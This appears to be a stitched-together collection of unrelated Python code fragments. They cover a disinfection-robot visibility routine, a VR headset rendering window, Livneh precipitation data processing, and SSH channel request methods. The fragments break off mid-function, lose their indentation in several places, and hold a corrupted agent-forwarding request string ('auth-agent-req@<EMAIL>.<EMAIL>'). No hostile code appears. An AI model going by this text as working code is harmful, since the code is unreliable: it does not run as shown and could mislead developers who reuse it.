            else:
                # Energy received follows an inverse-square law and Lambert's cosine law
                room_intensities[guard_idx, room_idx] = robot_power * np.cos(angle) * 1/(4 * np.pi * (distance_2d**2 + robot_height**2))
    # Patch up visibility.
    eps_room = prep(room.room.buffer(EPS))
    room_vis_preprocessing = compute_skgeom_visibility_preprocessing(room.room.buffer(EPS))
    # Precompute visibility polygons
    print("Precomputing visibility polygons")
    if use_weak_everything:
        room_visibility = [None]*room.full_room_grid.shape[0]
        for i, room_pt in enumerate(room.full_room_grid):
            room_visibility[i] = compute_visibility_polygon(room_vis_preprocessing, room_pt)
    elif use_strong_visibility:
        guard_visibility = [None]*room.guard_grid.shape[0]
        for i, guard_pt in enumerate(room.guard_grid):
            guard_visibility[i] = compute_visibility_polygon(room_vis_preprocessing, guard_pt)
    print("Finished Precomputing visibility polygons")
    broken_sightlines_count = 0
    broken_sightlines_list = []
    not_visible_room_idx = []
    # Zero out every (guard, room) pair without line of sight.
    for guard_idx, guard_point in enumerate(room.guard_grid):
        if guard_idx % 50 == 0: print("Processing guard index: {}/{}".format(guard_idx, room.guard_grid.shape[0]))
        for room_idx, room_point in enumerate(room.full_room_grid):
            if use_weak_everything:
                # Check that *room* can see at least one point in guard cell
                room_point_vis = room_visibility[room_idx]
                guard_cell = room.guard_cells[guard_idx]
                is_visible = not room_point_vis.intersection(guard_cell).is_empty
            elif use_strong_visibility:
                # If a point can see all vertices of a simple polygon,
                # then it can see the entire polygon
                room_cell = room.full_room_cells[room_idx]
                if room.full_room_iswall[room_idx] == 0: # Floor cell
                    room_cell_points = list(room_cell.exterior.coords)
                elif room.full_room_iswall[room_idx] == 1: # Wall cell
                    room_cell_points = list(room_cell.coords)
                else:
                    raise Exception("Unable to classify room cell: ", room_cell)
                sightlines = [LineString([pt, guard_point]) for pt in room_cell_points]
                is_visible = all([eps_room.contains(line) for line in sightlines])
            else:
                sight = LineString([guard_point, room_point])
                is_visible = eps_room.contains(sight)
            if not is_visible:
                broken_sightlines_list.append((guard_point, room_point))
                broken_sightlines_count += 1
                room_intensities[guard_idx, room_idx] = 0
    # Ignore unreachable room points (do not guarantee that they are illuminated)
    # All intensities are lower than 'robot_power', so we must spend at least
    # 'threshold'/'robot_power' time in the solution.
    # By assigning all unreachable room points a fake intensity of 'robot_power'
    # everywhere, we guarantee that any solution that covers the reachable
    # room points will also "cover" the unreachable room points
    # In other words, the algorithm will ignore the unreachable room points
    not_visible_room_idx = np.argwhere(np.max(room_intensities, axis = 0) == 0).flatten()
    room_intensities[:, not_visible_room_idx] = robot_power
    if len(not_visible_room_idx) > 0:
        print('CAUTION: Not all points in the room can be illuminated')
        print(' Red regions will not be disinfected by the robot')
        print('(Visualization assume "strong distance" algorithm is used:')
        print(' the "branch-and-bound" algorithm will disinfect slightly more.)')
        # NOTE(review): visualization is nested under the unreachable-points
        # case, matching the warnings it illustrates — confirm intended scope.
        if show_visualization:
            plt.imshow(room.room_img)
            plt.plot(*transform(room.xy_to_pixel, room.room).exterior.coords.xy, 'black')
            for i in not_visible_room_idx:
                if room.full_room_iswall[i] == 0:
                    plt.fill(*transform(room.xy_to_pixel, room.full_room_cells[i]).exterior.coords.xy, 'red')
                elif room.full_room_iswall[i] == 1:
                    plt.fill(*transform(room.xy_to_pixel, room.full_room_cells[i]).coords.xy, 'red')
                else:
                    raise Exception("Unable to classify room cell: ", room.full_room_cells[i])
            plt.show()
    print('Removed', broken_sightlines_count, 'broken sightlines')
    return room_intensities, not_visible_room_idx
# Note: disinfection_region is a shapely object (I *think* either a Polygon
# or Multipolygon) representing the region that we guarantee receives
# at least some illumination
def get_scale(room, min_intensity, disinfected_region, waiting_times, scaling_method,
robot_power, robot_height, robot_radius, use_shadow):
if scaling_method == 'epsilon':
print('ERROR: Epsilon scaling not currently supported. Need to convert epsilon to units of robot height')
return None
scale = (np.sqrt(room.room_eps**2 + 4) + room.room_eps)/(np.sqrt(room.room_eps**2 + 4) - room.room_eps)
| |
clear : boolean
Clear the color, stencil and depth buffer.
"""
# if monoscopic, nop
if self._monoscopic:
warnings.warn("`setBuffer` called in monoscopic mode.", RuntimeWarning)
return
# check if the buffer name is valid
if buffer not in ('left', 'right'):
raise RuntimeError("Invalid buffer name specified.")
# bind the framebuffer, if MSAA is enabled binding the texture is
# deferred until the MSAA buffer is resolved.
if self._samples > 1:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.frameBufferMsaa)
else:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.frameBuffer)
GL.glFramebufferTexture2D(
GL.GL_FRAMEBUFFER,
GL.GL_COLOR_ATTACHMENT0,
GL.GL_TEXTURE_2D,
self.frameTexture,
0)
self.buffer = buffer # set buffer string
GL.glEnable(GL.GL_SCISSOR_TEST)
# set the viewport and scissor rect for the buffer
if buffer == 'left':
self.viewport = self.scissor = libovr.getEyeRenderViewport(
libovr.EYE_LEFT)
elif buffer == 'right':
self.viewport = self.scissor = libovr.getEyeRenderViewport(
libovr.EYE_RIGHT)
if clear:
self.setColor(self.color) # clear the texture to the window color
GL.glClearDepth(1.0)
GL.glDepthMask(GL.GL_TRUE)
GL.glClear(
GL.GL_COLOR_BUFFER_BIT |
GL.GL_DEPTH_BUFFER_BIT |
GL.GL_STENCIL_BUFFER_BIT)
# if self.sRGB:
# GL.glDisable(GL.GL_FRAMEBUFFER_SRGB)
if self._samples > 1:
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glDisable(GL.GL_TEXTURE_2D)
GL.glEnable(GL.GL_BLEND)
def getPredictedDisplayTime(self):
"""Get the predicted time the next frame will be displayed on the HMD.
The returned time is referenced to the clock `LibOVR` is using.
Returns
-------
float
Absolute frame mid-point time for the given frame index in seconds.
"""
return libovr.getPredictedDisplayTime(self._frameIndex)
def getTimeInSeconds(self):
"""Absolute time in seconds. The returned time is referenced to the
clock `LibOVR` is using.
Returns
-------
float
Time in seconds.
"""
return libovr.timeInSeconds()
@property
def viewMatrix(self):
"""The view matrix for the current eye buffer. Only valid after a
:py:method:`calcEyePoses` call. Note that setting `viewMatrix` manually
will break visibility culling.
"""
if not self._monoscopic:
if self.buffer == 'left':
return self._viewMatrix[libovr.EYE_LEFT]
elif self.buffer == 'right':
return self._viewMatrix[libovr.EYE_RIGHT]
else:
return self._viewMatrix
@property
def nearClip(self):
"""Distance to the near clipping plane in meters."""
return self._nearClip
@nearClip.setter
def nearClip(self, value):
self._nearClip = value
self._updateProjectionMatrix()
@property
def farClip(self):
"""Distance to the far clipping plane in meters."""
return self._farClip
@farClip.setter
def farClip(self, value):
self._farClip = value
self._updateProjectionMatrix()
@property
def projectionMatrix(self):
"""Get the projection matrix for the current eye buffer. Note that
setting `projectionMatrix` manually will break visibility culling.
"""
if not self._monoscopic:
if self.buffer == 'left':
return self._projectionMatrix[libovr.EYE_LEFT]
elif self.buffer == 'right':
return self._projectionMatrix[libovr.EYE_RIGHT]
else:
return self._projectionMatrix
@property
def isBoundaryVisible(self):
"""True if the VR boundary is visible.
"""
result, isVisible = libovr.getBoundaryVisible()
return bool(isVisible)
def getBoundaryDimensions(self, boundaryType='PlayArea'):
"""Get boundary dimensions.
Parameters
----------
boundaryType : str
Boundary type, can be 'PlayArea' or 'Outer'.
Returns
-------
ndarray
Dimensions of the boundary meters [x, y, z].
"""
result, dims = libovr.getBoundaryDimensions(
RIFT_BOUNDARY_TYPE[boundaryType])
return dims
@property
def connectedControllers(self):
"""Connected controller types (`list` of `str`)"""
controllers = libovr.getConnectedControllerTypes()
ctrlKeys = {val: key for key, val in RIFT_CONTROLLER_TYPES.items()}
return [ctrlKeys[ctrl] for ctrl in controllers]
def updateInputState(self, controllers=None):
"""Update all connected controller states. This updates controller input
states for an input device managed by `LibOVR`.
The polling time for each device is accessible through the
`controllerPollTimes` attribute. This attribute returns a dictionary
where the polling time from the last `updateInputState` call for a
given controller can be retrieved by using the name as a key.
Parameters
----------
controllers : tuple or list, optional
List of controllers to poll. If `None`, all available controllers
will be polled.
Examples
--------
Poll the state of specific controllers by name::
controllers = ['XBox', 'Touch']
updateInputState(controllers)
"""
if controllers is None:
toPoll = libovr.getConnectedControllerTypes()
elif isinstance(controllers, (list, tuple,)):
toPoll = [RIFT_CONTROLLER_TYPES[ctrl] for ctrl in controllers]
else:
raise TypeError("Argument 'controllers' must be iterable type.")
for i in toPoll:
result, t_sec = libovr.updateInputState(i)
self.controllerPollTimes[RIFT_CONTROLLER_TYPES[i]] = t_sec
    def _waitToBeginHmdFrame(self):
        """Wait until the HMD surfaces are available for rendering.

        Blocks on the compositor (similar to waiting for v-sync), refreshes
        the cached session status and last-frame performance statistics, and
        optionally polls controller input. Must run once per frame before
        `_startHmdFrame`.
        """
        # First time this function is called, make True.
        if not self._allowHmdRendering:
            self._allowHmdRendering = True
        # update session status (visibility, focus, etc.)
        result, status = libovr.getSessionStatus()
        self._sessionStatus = status
        # get performance stats for the last frame
        self._updatePerfStats()
        # Wait for the buffer to be freed by the compositor, this is like
        # waiting for v-sync.
        libovr.waitToBeginFrame(self._frameIndex)
        # update input states automatically if the user requested it
        if self.autoUpdateInput:
            self.updateInputState()
        #if result == ovr.SUCCESS_NOT_VISIBLE:
        #    pass
        #self.updateInputState() # poll controller states
        # # update the tracking state
        # if self.autoUpdatePoses:
        #     # get the current frame time
        #     absTime = libovr.getPredictedDisplayTime(self._frameIndex)
        #     # Get the current tracking state structure, estimated poses for the
        #     # head and hands are stored here. The latency marker for computing
        #     # motion-to-photon latency is set when this function is called.
        #     self.calcEyePoses()
    def _startHmdFrame(self):
        """Prepare to render an HMD frame. This must be called every frame
        before flipping or setting the view buffer.

        This function will wait until the HMD is ready to begin rendering before
        continuing. The current frame texture from the swap chain are pulled
        from the SDK and made available for binding.
        """
        # begin frame (pairs with `endFrame` in `_startOfFlip`)
        libovr.beginFrame(self._frameIndex)
        # get the next available buffer texture in the swap chain; the swap
        # chain index changes each frame, so both lookups happen per-frame
        result, swapChainIdx = libovr.getTextureSwapChainCurrentIndex(
            libovr.TEXTURE_SWAP_CHAIN0)
        result, colorTextureId = libovr.getTextureSwapChainBufferGL(
            libovr.TEXTURE_SWAP_CHAIN0, swapChainIdx)
        self.frameTexture = colorTextureId  # OpenGL texture name to render into
        # If mono mode, we want to configure the render framebuffer at this
        # point since 'setBuffer' will not be called.
        if self._monoscopic:
            self._prepareMonoFrame()
    def _startOfFlip(self):
        """Custom :py:class:`~Rift._startOfFlip` for HMD rendering. This
        finalizes the HMD texture before diverting drawing operations back to
        the on-screen window. This allows :py:class:`~Rift.flip` to swap the
        on-screen and HMD buffers when called. This function always returns
        `True`.

        Returns
        -------
        True
        """
        # Switch off multi-sampling
        GL.glDisable(GL.GL_MULTISAMPLE)
        if self._allowHmdRendering:
            # resolve MSAA buffers before handing the texture to the compositor
            self._resolveMSAA()
            # commit current texture buffer to the swap chain
            libovr.commitTextureSwapChain(libovr.TEXTURE_SWAP_CHAIN0)
            # Call end_frame and increment the frame index, no more rendering to
            # HMD's view texture at this point.
            result, _ = libovr.endFrame(self._frameIndex)
            if libovr.failure(result):
                if result == libovr.ERROR_DISPLAY_LOST:  # display lost!
                    # unrecoverable: tear down all SDK resources before raising
                    libovr.destroyMirrorTexture()
                    libovr.destroyTextureSwapChain(libovr.TEXTURE_SWAP_CHAIN0)
                    libovr.destroy()
                    libovr.shutdown()
                _, msg = libovr.getLastErrorInfo()
                raise LibOVRError(msg)
            self._frameIndex += 1  # increment frame index
        # Set to None so the 'size' attribute returns the on-screen window size.
        self.buffer = None
        # Make sure this is called after flipping, this updates VR information
        # and diverts rendering to the HMD texture.
        #self.callOnFlip(self._waitToBeginHmdFrame)
        # Call frame timing routines
        #self.callOnFlip(self._updatePerformanceStats)
        # This always returns True
        return True
def flip(self, clearBuffer=True, drawMirror=True):
"""Submit view buffer images to the HMD's compositor for display at next
V-SYNC and draw the mirror texture to the on-screen window. This must
be called every frame.
Parameters
----------
clearBuffer : bool
Clear the frame after flipping.
drawMirror : bool
Draw the HMD mirror texture from the compositor to the window.
Returns
-------
float
Absolute time in seconds when control was given back to the
application. The difference between the current and previous values
should be very close to 1 / refreshRate of the HMD.
Notes
-----
* The HMD compositor and application are asynchronous, therefore there
is no guarantee that the timestamp returned by 'flip' corresponds to
the exact vertical retrace time of the HMD.
"""
# NOTE: Most of this code is shared with the regular Window's flip
# function for compatibility. We're only concerned with calling the
# _startOfFlip function and drawing the mirror texture to the onscreen
# window. Display timing functions are kept in for now, but they are not
# active.
#
flipThisFrame = self._startOfFlip()
if flipThisFrame:
self._prepareFBOrender()
# need blit the framebuffer object to the actual back buffer
result, mirrorTexId = libovr.getMirrorTexture()
if libovr.failure(result):
_, msg = libovr.getLastErrorInfo()
raise LibOVRError(msg)
# unbind the framebuffer as the render target
GL.glBindFramebufferEXT(GL.GL_FRAMEBUFFER_EXT, 0)
GL.glDisable(GL.GL_BLEND)
stencilOn = GL.glIsEnabled(GL.GL_STENCIL_TEST)
GL.glDisable(GL.GL_STENCIL_TEST)
win_w, win_h = self.frameBufferSize
self.viewport = self.scissor = (0, 0, win_w, win_h)
# draw the mirror texture, if not anything drawn to the backbuffer
# will be displayed instead
if drawMirror:
# blit mirror texture
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self._mirrorFbo)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, 0)
GL.glEnable(GL.GL_FRAMEBUFFER_SRGB)
# bind the rift's texture to the framebuffer
GL.glFramebufferTexture2D(
GL.GL_READ_FRAMEBUFFER,
GL.GL_COLOR_ATTACHMENT0,
GL.GL_TEXTURE_2D, mirrorTexId, 0)
win_w, win_h = self.frameBufferSize
tex_w, tex_h = self._mirrorRes
self.viewport = self.scissor = (0, 0, win_w, win_h)
GL.glClearColor(0.0, 0.0, 0.0, 1.0)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glBlitFramebuffer(0, 0, tex_w, tex_h,
0, win_h, win_w, 0, # flips texture
GL.GL_COLOR_BUFFER_BIT,
GL.GL_LINEAR)
GL.glDisable(GL.GL_FRAMEBUFFER_SRGB)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self._finishFBOrender()
# | |
import geopandas
import pandas as pd
import xarray as xr
import dataimports.waterboundary as wbd
from shapely.geometry import Polygon
def aggregateprocessedfiles(directory: str, years: range) -> pd.DataFrame:
    '''
    Generates a new dataframe in the form:
        index 1 2 ... n-1 n
        <year 1>
        <year 2>
        .
        .
        .
        <year t - 1>
        <year t> . . ... . .
    from a specified set of files, where each row in the new dataframe contains the year's n grid cells' precipitation data.
    The input files are imported from a specified directory with file names in the form: 'prec.<year>.csv' where <year> is a year in the specified list of years.

    Inputs:
        (1) directory: string directory path (including the trailing separator).
        (2) years: range (or iterable) of years to aggregate.
    Output: a pandas DataFrame with one row per year, indexed by year string.
    '''
    # Collect one single-row frame per year and concatenate once at the end.
    # (DataFrame.append was removed in pandas 2.0 and repeated appends were
    # O(n^2) anyway.)
    frames = []
    for yr in years:
        frame = (pd.read_csv(directory + 'prec.' + str(yr) + '.csv')
                 .sort_values(by=['id'])
                 .filter(['id', 'prec'])
                 .rename(columns={'prec': str(yr)})
                 .set_index('id')
                 .T)
        frames.append(frame)
    return pd.concat(frames)
def eventdates(directory: str, years: range) -> pd.DataFrame:
    '''
    Builds a DataFrame of the first recorded date in each year's file.

    (The previous docstring claimed a dictionary was returned; the function
    has always returned a DataFrame with columns date/year/month/day.)

    Inputs:
        (1) directory: string directory path (including the trailing separator).
        (2) years: range (or iterable) of years; each must have a
            'prec.<year>.csv' file in the directory.
    Output: a pandas DataFrame with columns ['date', 'year', 'month', 'day'],
            one row per year, taken from the first row of each file.
    '''
    records = []
    for yr in years:
        yearly = pd.read_csv(directory + 'prec.' + str(yr) + '.csv')
        # the files are assumed pre-sorted so row 0 is the event of interest
        date = yearly.iloc[0].loc['time']
        day = yearly['day'].iloc[0]
        month = yearly['month'].iloc[0]
        records.append([date, yr, month, day])
    return pd.DataFrame(records, columns=['date', 'year', 'month', 'day'])
def inputfilepaths(directory: str, vars: list, yrs: list) -> list:
    '''
    Generates a list of file paths in the specified directory with the form <var>.<year>.nc

    Inputs:
        (1) directory: string directory path.
        (2) vars: list of variable identification strings (i.e. prec, tmin, tmax, etc.).
        (3) yrs: list of year strings in the form yyyy.
    Output: a list of string file paths.
    '''
    paths: list = []
    print('Input file list: \n\t[')
    for variable in vars:
        for year in yrs:
            filename = str(variable) + '.' + str(year) + '.nc'
            paths.append(directory + filename)
            print('\t' + ' ' + filename)
    print('\t]')
    return paths
def outputfilepaths(directory: str, filelist: str, extension: str = '.csv') -> list:
    '''
    Generates a list of file paths in the form <var>.<year>.<extension>

    Inputs:
        (1) directory: string directory path.
        (2) filelist: list of paths to files that will be processed.
        (3) extension: string output file extension, .csv by default.
    Output: a list of string file paths.
    '''
    print('Output file list: \n\t[')
    # delegate the per-file name mangling (and the per-file echo) to
    # outputfilepath
    paths: list = [outputfilepath(directory, inputfile, extension)
                   for inputfile in filelist]
    print('\t]')
    return paths
def outputfilepath(directory: str, file: str, extension: str = '.csv'):
    '''Map one input file path onto the output directory, swapping its
    extension (e.g. 'data/prec.2000.nc' -> directory + 'prec.2000.csv').
    Echoes the generated filename as a side effect.'''
    # strip the source directory, then the old extension
    basename = file.rsplit('/', 1)[1]
    stem = basename.rsplit('.', 1)[0]
    filename = stem + extension
    print('\t' + ' ' + filename)
    return directory + filename
def processfiles(files: list, outputs: list, box: list, shape: geopandas.GeoDataFrame, shapearea: float, maxdaydirectory: str) -> dict:
    '''Process each input file: clip it to the watershed, attach cell areas
    and ids (computed once from the first file), write the per-file CSV, and
    collect each file's maximum-precipitation day.

    Output: dict mapping max-day date -> basin-weighted precipitation.'''
    maxdays = {}
    ids = None
    for index, file in enumerate(files):
        print(index)
        clipped = processfile(file, box, shape)
        if index == 0:
            # areas/ids are identical across files, so compute them once
            print('Generating IDs dataframe...')
            ids = km2areasandIDs(clipped, shapearea)
            print(ids.head())
        print('\t Merging areas and IDs...')
        clipped = mergebylatlon(clipped, ids)
        clipped.to_csv(outputs[index])
        date, precip = maxday(clipped, outputfilepath(maxdaydirectory, file))
        maxdays[date] = precip
    return maxdays
def maxday(df, outpath: str) -> tuple:
    '''Find the day with the largest basin-weighted precipitation.

    Adds a 'weightedprec' column to *df* in place, writes the rows of the
    peak day to *outpath*, and returns (date, weighted precipitation).'''
    print('Computing max day:')
    df['weightedprec'] = df['prec'] * df['areaweight']
    # basin-wide weighted total per calendar day
    daily = df.groupby(['time', 'year', 'month', 'day'])['weightedprec'].sum().reset_index()
    peak = daily['weightedprec'].max()
    peakrows = daily[daily['weightedprec'] == peak]
    peakdate = peakrows.iloc[0]['time']
    # persist the full per-cell records for the peak day
    df[df['time'] == peakdate].to_csv(outpath)
    entry = (peakdate, peak)
    print(entry)
    return entry
def processfile(filepath: str, boundingbox: list, mask: geopandas.GeoDataFrame, coordinatesystem: str = '4326', shift: float = 1/32):
    '''Import one Livneh NetCDF file, build grid-cell polygon geometry, and
    clip it to the watershed mask.

    Inputs:
        (1) filepath: Livneh NetCDF string file path.
        (2) boundingbox: [E, S, W, N] coordinates used to pre-clip the import.
        (3) mask: geopandas.GeoDataFrame watershed polygon to clip against.
        (4) coordinatesystem: EPSG code string for the point geometry, '4326' by default.
        (5) shift: half-width of a grid cell in degrees, 1/32 by default.
            (annotation corrected from `int` — the default is a float)
    Output: a geopandas.GeoDataFrame of grid polygons clipped to the mask.
    '''
    df = importfile(filepath, boundingbox)
    print('\t Creating file geometry...')
    gdf = convert2geodataframe(df, coordinatesystem)
    print('\t Converting livneh points to grid geometry...')
    grids = points2grids(gdf, shift)
    print('\t Clipping data to watershed polygon (this may take a while)...')
    # clip the grid polygons: previously this clipped `gdf`, which only worked
    # because points2grids mutates gdf in place; clipping `grids` states the
    # intent directly and survives a non-mutating points2grids
    wbgrids = clipdataframe(grids, mask)
    return wbgrids
def importfile(filepath: str, boundingbox: list)-> pd.DataFrame:
    '''
    Imports a Livneh NetCDF file and returns a pandas DataFrame

    Inputs:
        (1) filepath: Livneh NetCDF string file path
        (2) boundingbox: list of latitude and longitude coordinates in form [E, S, W, N].
    Output: a pandas DataFrame with 180-degree longitudes and parsed
            year/month/day columns.
    '''
    print('Importing ' + str(filepath))
    # Import NetCDF file as XArray data
    dataset = xr.open_dataset(filepath)
    if boundingbox is not None:
        # bounding box is based on 180 longitudes; livneh data is based on
        # 360 degree longitude, hence the +360 offsets below
        print('\t Clipping data to boundary box...')
        east, south, west, north = boundingbox
        dataset = dataset.where(dataset.lon > east + 360, drop=True)
        dataset = dataset.where(dataset.lat > south, drop=True)
        dataset = dataset.where(dataset.lon < west + 360, drop=True)
        dataset = dataset.where(dataset.lat < north, drop=True)
    # flatten the multi-index frame produced by xarray, then normalize
    # longitudes and split the timestamp into year/month/day columns
    frame: pd.DataFrame = dataset.to_dataframe().reset_index()
    frame = __180longitude(frame)
    frame = __processdates(frame)
    return frame
def convert2geodataframe(df: pd.DataFrame, coordinatesystem = '4326'):
    '''Wrap *df* in a GeoDataFrame with point geometry built from its
    lon/lat columns, in the given EPSG coordinate system ('4326' default).'''
    points = geopandas.points_from_xy(df['lon'], df['lat'])
    return geopandas.GeoDataFrame(df, geometry=points,
                                  crs='EPSG:' + str(coordinatesystem))
def points2grids(gdf: geopandas.GeoDataFrame, shift: int = 1/32):
    '''
    Turns Livneh gridcell point geometry into a Livneh grid polygon.

    Inputs:
        (1) gdf: geopandas.GeoDataFrame containing the Livneh grid cell centroids.
        (2) shift: a radius shift from gridcell centroid to the grid polygon edges. 1/32nd degree by default.
    Output: the same GeoDataFrame with its 'geometry' column replaced in
            place by square cell polygons.
    '''
    polygons: list = []
    for _, cell in gdf.iterrows():
        lon = float(cell['lon'])
        lat = float(cell['lat'])
        west, east = lon - shift, lon + shift
        south, north = lat - shift, lat + shift
        # corners in NW, NE, SE, SW order
        corners = [(west, north), (east, north), (east, south), (west, south)]
        polygons.append(Polygon(corners))
    gdf['geometry'] = polygons
    return gdf
def clipdataframe(gdf: geopandas.GeoDataFrame, mask: geopandas.GeoDataFrame) -> geopandas.GeoDataFrame:
    '''Reproject *gdf* into the mask's CRS and clip it to the mask geometry.'''
    reprojected = gdf.to_crs(mask.crs)
    return geopandas.clip(reprojected, mask, keep_geom_type=False)
def __180longitude(df: pd.DataFrame) -> pd.DataFrame:
    '''Convert the 'lon' column from the Livneh 360-degree convention to the
    [-180, 180] (negative-west) convention, in place, and return *df*.'''
    # vectorized subtraction replaces the per-element apply(); identical
    # values, one C-level pass
    df['lon'] = df['lon'] - 360
    return df
def __processdates(df: pd.DataFrame) -> pd.DataFrame:
    '''Split the 'time' column (e.g. '2000-05-03 00:00:00') into integer
    'year', 'month' and 'day' columns, in place, and return *df*.'''
    pieces = df['time'].apply(lambda stamp: str(stamp).split("-", 4))
    df['year'] = pieces.apply(lambda p: int(p[0]))
    df['month'] = pieces.apply(lambda p: int(p[1]))
    # the day field may carry a trailing time-of-day; keep only the day part
    df['day'] = pieces.apply(lambda p: int(p[2].split()[0]))
    return df
def km2areasandIDs(gdf: geopandas.GeoDataFrame, totalarea: float):
    '''Build a per-grid-cell lookup of projected area (km^2), area weight and
    a stable integer id, using a single timestep of *gdf*.

    Inputs:
        (1) gdf: clipped Livneh grid GeoDataFrame (polygon geometry).
        (2) totalarea: watershed area in km^2 used for the weights.
    Output: a plain DataFrame with columns
            ['lat', 'lon', 'area_km2', 'wsarea_km2', 'areaweight', 'id'].
    '''
    # one timestep is enough: the grid is identical on every date
    firsttime = gdf.iloc[0]['time']
    cells = gdf[gdf['time'] == firsttime]
    # deterministic ordering (N->S, W->E) so ids are stable across files
    cells = cells.sort_values(by=['lat', 'lon'], ascending=[False, True])
    cells = cells.reset_index()
    cells['id'] = cells.index
    # project to web mercator so .area is in square meters, then to km^2
    cells = cells.to_crs('EPSG:3857')
    cells['area_km2'] = cells['geometry'].area / 1000000
    cells['wsarea_km2'] = totalarea
    cells['areaweight'] = cells['area_km2'] / totalarea
    return cells.filter(['lat', 'lon', 'area_km2', 'wsarea_km2', 'areaweight', 'id'])
def mergebylatlon(left, right):
    '''Inner-join two frames on their shared 'lat' and 'lon' columns.'''
    return left.merge(right, on=['lat', 'lon'], how='inner')
def importlivnehfiles(filepaths: list, maskingdata = geopandas.GeoDataFrame, grids: bool = True, crs: str = '4326', max: bool = True, outputfilepaths: list = []):
'''
Imports a set of livneh files returning a list of the geopandas GeoDataFrames
Inputs:
(1) a string list of livneh netCDF filepaths
(2) a geopandas GeoDataFrame containing the watershed of interest, used to clip the data
(3) a boolean indicating if grids or points should be returned, the default value True indicates grids
(4) a string identifier for the coordinate reference system, '4356' by default.
Output: a list of geopandas GeoDataFrames
'''
i: int = 0
dfs: list = []
export: bool = False
if len(outputfilepaths) == len(filepaths):
export = True
# create a bounding box for importing the netCDF files
boundingbox = wbd.boundaryboxfromshape(maskingdata, buffer=True, buffersize=1/32)
for file in filepaths:
print('Processing ' + str(file) + '...')
netCDF = xr.open_dataset(file)
# edit longitudes: livneh longitudes are in 360 degree format, but the bounding boxes are in 180 (e.g. negative west longitude) format
netCDF = netCDF \
.where(netCDF.lon > boundingbox[0] + 360, drop=True) \
.where(netCDF.lat > boundingbox[1], drop=True) \
.where(netCDF.lon < boundingbox[2] + 360, drop=True) \
.where(netCDF.lat < boundingbox[3], drop=True)
# flattening the mult-index dataframe that comes fromfrom xarray
df: pd.DataFrame = __cleaner(netCDF.to_dataframe().reset_index())
# convert to geopandas with lat lon points
print('\t...creating file geometry')
df = geopandas.GeoDataFrame(df, geometry=geopandas.points_from_xy(df['lon'], df['lat']), crs='EPSG:' + str(crs))
if grids:
# convert to point to grids
df = __points2grids(df, crs=crs)
print('\t...clipping file to masking layer')
df = geopandas.clip(df, maskingdata, keep_geom_type=False)
# max precipitation day - make it a function that is passed in.
if max:
a = df.to_crs(epsg='3857')
a['area_m2'] = a['geometry'].area
wsarea = a[(a['month'] == 1) & (a['day'] == 1)]
wsarea['basin_area_m2'] = wsarea['area_m2'].sum()
wsarea = wsarea.filter(['time', 'basin_area_m2'])
merge = a.merge(wsarea, on='time')
merge['weights'] = merge['area_m2'] / merge['basin_area_m2']
merge['weightedprec'] = merge['prec'] * merge['weights']
day = merge.groupby(['time', 'year', 'month', 'day'])['weightedprec'].sum().reset_index()
print(str(day['weightedprec']) + ' on ' + str(day['time']))
time = day.iloc[0]['time']
maxday = merge[merge['time'] == str(time)]
#check | |
after
it completes.
:param int status: the exit code of the process
.. versionadded:: 1.2
"""
# in many cases, the channel will not still be open here.
# that's fine.
m = Message()
m.add_byte(cMSG_CHANNEL_REQUEST)
m.add_int(self.remote_chanid)
m.add_string('exit-status')
m.add_boolean(False)
m.add_int(status)
self.transport._send_user_message(m)
    @open_only
    def request_x11(self, screen_number=0, auth_protocol=None, auth_cookie=None,
                    single_connection=False, handler=None):
        """
        Request an x11 session on this channel. If the server allows it,
        further x11 requests can be made from the server to the client,
        when an x11 application is run in a shell session.

        From RFC4254::

            It is RECOMMENDED that the 'x11 authentication cookie' that is
            sent be a fake, random cookie, and that the cookie be checked and
            replaced by the real cookie when a connection request is received.

        If you omit the auth_cookie, a new secure random 128-bit value will be
        generated, used, and returned. You will need to use this value to
        verify incoming x11 requests and replace them with the actual local
        x11 cookie (which requires some knowledge of the x11 protocol).

        If a handler is passed in, the handler is called from another thread
        whenever a new x11 connection arrives. The default handler queues up
        incoming x11 connections, which may be retrieved using
        `.Transport.accept`. The handler's calling signature is::

            handler(channel: Channel, (address: str, port: int))

        :param int screen_number: the x11 screen number (0, 10, etc.)
        :param str auth_protocol:
            the name of the X11 authentication method used; if none is given,
            ``"MIT-MAGIC-COOKIE-1"`` is used
        :param str auth_cookie:
            hexadecimal string containing the x11 auth cookie; if none is
            given, a secure random 128-bit value is generated
        :param bool single_connection:
            if True, only a single x11 connection will be forwarded (by
            default, any number of x11 connections can arrive over this
            session)
        :param function handler:
            an optional handler to use for incoming X11 connections
        :return: the auth_cookie used
        """
        if auth_protocol is None:
            auth_protocol = 'MIT-MAGIC-COOKIE-1'
        if auth_cookie is None:
            # 128 random bits, hex-encoded (see RFC4254 recommendation above)
            auth_cookie = binascii.hexlify(os.urandom(16))
        # build the SSH_MSG_CHANNEL_REQUEST packet; field order is fixed by
        # RFC4254 section 6.3.1
        m = Message()
        m.add_byte(cMSG_CHANNEL_REQUEST)
        m.add_int(self.remote_chanid)
        m.add_string('x11-req')
        m.add_boolean(True)  # want_reply: we block until the server answers
        m.add_boolean(single_connection)
        m.add_string(auth_protocol)
        m.add_string(auth_cookie)
        m.add_int(screen_number)
        # mark an event pending *before* sending so the reply can't race us
        self._event_pending()
        self.transport._send_user_message(m)
        self._wait_for_event()
        self.transport._set_x11_handler(handler)
        return auth_cookie
    @open_only
    def request_forward_agent(self, handler):
        """
        Request for a forward SSH Agent on this channel.
        This is only valid for an ssh-agent from OpenSSH !!!

        :param function handler:
            a required handler to use for incoming SSH Agent connections
        :return: True if we are ok, else False (at that time we always return ok)
        :raises: SSHException in case of channel problem.
        """
        # build the OpenSSH-specific agent-forwarding channel request
        m = Message()
        m.add_byte(cMSG_CHANNEL_REQUEST)
        m.add_int(self.remote_chanid)
        m.add_string('auth-agent-req@<EMAIL>.<EMAIL>')
        m.add_boolean(False)  # want_reply=False: fire-and-forget request
        self.transport._send_user_message(m)
        # route incoming agent connections to the caller's handler
        self.transport._set_forward_agent_handler(handler)
        return True
def get_transport(self):
"""
Return the `.Transport` associated with this channel.
"""
return self.transport
def set_name(self, name):
"""
Set a name for this channel. Currently it's only used to set the name
of the channel in logfile entries. The name can be fetched with the
`get_name` method.
